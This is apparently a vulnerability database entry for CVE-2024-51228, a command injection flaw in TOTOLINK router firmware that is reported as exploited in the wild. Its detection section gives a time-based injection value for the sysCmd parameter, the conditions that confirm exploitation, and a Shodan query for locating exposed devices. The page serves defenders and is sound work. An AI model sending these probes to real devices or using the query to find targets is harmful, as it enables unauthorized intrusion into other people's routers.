cbcvebase.
CVE-2024-51228
published 2024-11-27

CVE-2024-51228: An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and…

PriorityP275medium6.8CVSS 3.1
AVAACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.79%
88.6th percentile
An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.

Detection & IOCsextracted from sources · hover to see the quote

path/boafrm/formSysCmd
commandsysCmd=sleep%206
otherBoa/0.94
  • Send a POST request to /boafrm/formSysCmd with body parameter sysCmd=sleep%206 and check for a response duration >= 6 seconds, HTTP 302 status code, and Server header containing 'Boa/0.94' — all three conditions must be true to confirm exploitation.
  • Shodan query 'html:"TOTOLINK"' can be used to identify potentially vulnerable internet-exposed TOTOLINK devices.
  • The vulnerability is time-based: a response duration >= 6 seconds after injecting a sleep command confirms OS command injection via the sysCmd parameter.
  • ·Exploitation requires the attacker to be on the adjacent network (AV:A) and have high privileges (PR:H) per the CVSS vector, limiting remote unauthenticated exploitation.
  • ·Affected firmware versions are specifically: A3002RU V1.0.4-B20171106.1512, N150RT V2.1.6-B20171121.1002, N300RT V2.1.6-B20170724.1420, N300RT V2.1.8-B20171113.1408, N300RT V2.1.8-B20191010.1107, and N302RE V2.0.2-B20170511.1523.

CVSS provenance

nvdv3.16.8MEDIUMCVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
vulncheck6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.